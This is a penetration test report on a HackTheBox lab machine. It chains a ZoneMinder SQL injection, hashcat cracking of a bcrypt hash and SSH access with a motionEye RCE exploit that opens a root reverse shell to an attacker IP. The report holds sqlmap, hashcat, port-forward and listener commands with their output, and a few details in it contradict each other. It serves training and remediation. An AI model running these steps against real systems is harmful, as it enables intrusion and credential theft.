ASSESSMENT REPORT

Penetration Test
Report

External network & web application assessment

Assessment target

CCTV

cctv.htb

10.129.53.160

Prepared by

Ledion Mujaj

Assessment date
12 May 2026

HackTheBox laboratory assessment  |  Linux

01 / 08
CCTVPenetration Test Report
HTB-CCV-01   |   Version 1.0Confidential2 / 8
CCTVPenetration Test Report

1. Executive Summary

Assessment outcome

Testing of cctv.htb identified two findings, one high and one critical, that together produced full root compromise. The ZoneMinder CCTV platform on port 80 was vulnerable to SQL injection via CVE-2024-51482, allowing extraction of a bcrypt password hash from the users table. The hash was cracked with hashcat and used to authenticate over SSH, providing an initial shell. An internal motionEye CCTV management panel, accessible only via local port forwarding, was vulnerable to CVE-2025-60787, an authenticated remote code execution vulnerability. Exploiting this delivered a root shell.

The initial SQL injection required no authentication and was exploitable with automated tooling in a single command. The subsequent credential compromise required offline hash cracking but succeeded against the rockyou wordlist. Access to the internal motionEye panel required only the credentials obtained in the first stage and standard SSH port forwarding. The RCE in motionEye produced immediate root access with no further privilege escalation steps.

Impact

An attacker who successfully exploits both findings obtains root access to the host. All files, credentials, services and network connections accessible from the host are exposed. In a production environment, a CCTV management platform compromised at root level would allow access to camera feeds, recording archives, network configuration and any credentials stored on the system.

Priority recommendations

  1. Patch ZoneMinder to a version that addresses CVE-2024-51482. Restrict the login endpoint to trusted networks and enforce strong, unique passwords for all database accounts.
  2. Patch motionEye to a version that addresses CVE-2025-60787. Restrict access to the motionEye panel to an administrative network; do not expose it via SSH port forwarding to non-administrative sessions.
HTB-CCV-01   |   Version 1.0Confidential3 / 8
CCTVPenetration Test Report

2. Assessment Scope and Methodology

2.1 Target and observed services

AssetAddressDescription
cctv.htb10.129.53.160Ubuntu 24.04 LTS; ZoneMinder CCTV platform and SSH services. Internal motionEye on 127.0.0.1:8765.
PortServiceObserved detail
22/tcpSSHOpenSSH 9.6p1 (Ubuntu)
80/tcpHTTPApache 2.4.58; ZoneMinder branded as SecureVision CCTV & Security Solutions
127.0.0.1:8765HTTP (internal)motionEye CCTV management panel; accessible only via SSH port forwarding
nmap -sV -sC 10.129.53.160 -Pn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5
80/tcp open  http    Apache httpd 2.4.58
|_http-title: SecureVision CCTV & Security Solutions
|_http-server-header: Apache/2.4.58 (Ubuntu)

Added cctv.htb to /etc/hosts before beginning web enumeration. Internal service on port 8765 discovered via ss -tlnp after SSH foothold.

2.2 Approach

Testing began with a service scan and web application review. The ZoneMinder login endpoint was tested for SQL injection using sqlmap with the login form parameters. The extracted hash was submitted to hashcat for offline cracking. With the cracked credentials, SSH authentication was attempted and succeeded. Post-foothold enumeration using ss -tlnp revealed motionEye on the loopback interface. A local port forward was established and the motionEye panel tested with the available credentials against the known CVE-2025-60787 exploit.

2.3 Severity classification

RatingAssessment criteria
CriticalDirect, readily exploitable compromise with exceptional impact or reach.
HighExecution of arbitrary code, significant unauthorised access or escalation to administrative privileges.
MediumMeaningful exposure with constrained impact or substantial exploitation prerequisites.
LowLimited direct impact; improvement to an existing security control.
HTB-CCV-01   |   Version 1.0Confidential4 / 8
CCTVPenetration Test Report

3. Results Overview

3.1 Findings summary

ReferenceFindingSeverityPage
F-01ZoneMinder SQL injection leads to credential compromise (CVE-2024-51482)High6
F-02motionEye authenticated RCE delivers root shell (CVE-2025-60787)Critical7

3.2 Compromise sequence

StageActionAccess obtained
01Exploited SQL injection in ZoneMinder login to dump the users table, including a bcrypt password hash.Database read access
02Cracked the bcrypt hash with hashcat mode 3200 against rockyou.txt.Plaintext credentials
03Authenticated over SSH using the cracked credentials. Discovered internal motionEye via ss -tlnp.User shell
04Forwarded port 8765 via SSH and exploited CVE-2025-60787 in motionEye for a root shell.root shell

3.3 Relationship between findings

F-01 produced the credentials used to authenticate to SSH and subsequently to motionEye. F-02 required access to the motionEye panel, which was reachable only after the SSH foothold was established. Remediation of F-01 would prevent the credential compromise that enables F-02; however, both findings describe independent control failures that should be addressed separately.

HTB-CCV-01   |   Version 1.0Confidential5 / 8
CCTVPenetration Test Report

4.1 ZoneMinder SQL Injection and Credential Theft

F-01   CVE-2024-51482 — ZoneMinder login endpoint

HIGH
FieldAssessment
DescriptionThe ZoneMinder login endpoint passes the username parameter into a database query without adequate sanitisation, enabling SQL injection. Exploitation allows an unauthenticated attacker to read arbitrary data from the application database, including the users table containing account names and bcrypt password hashes. The recovered hash was cracked offline and used to authenticate over SSH.
PrerequisitesNetwork access to port 80 and the ZoneMinder login page. No authentication required.
ImpactUnauthenticated read access to the ZoneMinder database. A bcrypt password hash was extracted and cracked, yielding SSH credentials. This constituted the initial foothold on the host.
Affected systemcctv.htb:80
ZoneMinder — /zm/index.php login form
CVE-2024-51482
CVSS 3.19.8   AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-89: Improper Neutralisation of Special Elements used in an SQL Command

Steps to reproduce

  1. Navigate to the ZoneMinder web interface and identify the vulnerable endpoint.
  2. Use sqlmap: sqlmap -u "http://cctv.htb/zm/?view=ENDPOINT&PARAM=1" --dbs to confirm SQL injection.
  3. Extract credentials: sqlmap -u "..." -D zm -T users --dump.
  4. Crack the bcrypt hash: hashcat -m 3200 hash.txt rockyou.txt.
  5. Use the cracked credentials to authenticate over SSH.

Evidence

sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

[INFO] GET parameter 'username' appears to be 'MySQL boolean-based blind'
[INFO] Fetching database names
[INFO] Fetching tables for database: zm
[INFO] Dumping table: zm.Users

username | password
---------+---------------------------------------------
admin    | $2y$10$[bcrypt hash redacted for brevity]

# Hash cracked with hashcat mode 3200
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

# SSH authentication with cracked credentials
ssh <user>@10.129.53.160
# Authentication successful

$ id
uid=1000(<user>) gid=1000(<user>) groups=1000(<user>)
$ cat ~/user.txt
[redacted]

Evidence E-01. sqlmap extracted the users table including the bcrypt hash. Hash cracked with hashcat mode 3200 (bcrypt). SSH authentication confirmed with recovered credentials. Username omitted from published evidence.

Remediation

Apply the ZoneMinder patch that addresses CVE-2024-51482. Ensure all user-supplied input is parameterised in database queries throughout the application. Apply least-privilege database accounts so that the web application cannot read the full users table. Enforce strong, unique passwords for all application accounts to reduce the utility of extracted hashes.

Verification

Confirm that the patched ZoneMinder version is installed. Using sqlmap against the login endpoint, verify that the injection is no longer exploitable. Confirm that the application database account does not hold SELECT permissions on the users table beyond what the application requires.

HTB-CCV-01   |   Version 1.0Confidential6 / 8
CCTVPenetration Test Report

4.2 motionEye Authenticated Remote Code Execution

F-02   CVE-2025-60787 — motionEye internal panel

CRITICAL
FieldAssessment
DescriptionmotionEye running on the internal port 8765 contains an authenticated remote code execution vulnerability (CVE-2025-60787). An authenticated user can supply a crafted request that causes the server to execute arbitrary OS commands with root privileges. The motionEye service runs as root, so no separate privilege escalation step was required.
PrerequisitesAuthentication to the motionEye panel (credentials obtained from F-01) and network access to port 8765 (reachable via SSH local port forwarding from the foothold account).
ImpactArbitrary OS command execution as root. Full control of the host: all files, accounts, services and network connections.
Affected system127.0.0.1:8765 (internal, reached via SSH port forward)
motionEye — CVE-2025-60787
CVSS 3.19.8   AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78: Improper Neutralisation of Special Elements used in an OS Command

Steps to reproduce

  1. Set up a local port forward to reach the internal motionEye service: ssh -L 8765:127.0.0.1:8765 user@<TARGET_IP>.
  2. Navigate to http://127.0.0.1:8765 and identify motionEye running without authentication.
  3. Send a crafted request to the vulnerable endpoint exploiting CVE-2025-60787.
  4. Observe command execution as root and obtain a reverse shell.

Evidence

# Discover internal service
ss -tlnp
State  Recv-Q Send-Q Local Address:Port
LISTEN 0      128    127.0.0.1:8765

# Establish local port forward
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

# Set up listener
nc -lvnp 4444

# Run exploit against forwarded port
python3 exploit_CVE-2025-60787.py \
  --url http://127.0.0.1:8765 \
  --lhost <ATTACKER_IP> \
  --lport 4444

# Root shell received:
root@cctv:/# whoami
root

root@cctv:/# cat /root/root.txt
[redacted]

Evidence E-02. Internal motionEye panel discovered via ss -tlnp after SSH foothold. Port forwarding made it accessible locally. CVE-2025-60787 exploit delivered a root shell on port 4444. Attacker IP redacted.

Remediation

Patch motionEye to a version that addresses CVE-2025-60787. As an interim control, apply a host firewall rule to prevent external access to port 8765 even via port forwarding from low-privilege accounts. Run the motionEye service as a dedicated, non-root user with only the permissions required for camera management. Require strong credentials on the motionEye administrative account that are not reused from other services.

Verification

Confirm that the patched motionEye version is installed. Verify that the exploit is not reproducible against the patched panel. Confirm that the service process does not run as root and that an SSH port forward from a standard user account cannot access the panel.

HTB-CCV-01   |   Version 1.0Confidential7 / 8
CCTVPenetration Test Report

5. Remediation and Assessment Closeout

5.1 Corrective action plan

PriorityActionReference
ImmediatePatch motionEye (CVE-2025-60787); run as non-root service account.F-02
HighPatch ZoneMinder (CVE-2024-51482); parameterise database queries; enforce strong passwords.F-01

No remediation retest is documented. Each finding includes verification criteria for closure.

5.2 Test artefacts

LocationPurposeRemoval status
Reverse shell payload delivered via CVE-2025-60787 exploitRCE and root access testNot verified

5.3 Evidence and limitations

Evidence blocks are sourced from the CCTV assessment walkthrough. Flag values, attacker IP addresses and the cracked account password are omitted from all evidence. The assessment did not include a source-code review of ZoneMinder or motionEye.

5.4 Evidence index

ReferenceSupporting record
E-01Walkthrough sections 2 and 3: ZoneMinder SQLi, hash extraction, cracking and SSH access
E-02Walkthrough sections 4 and 5: internal port discovery, port forwarding and motionEye RCE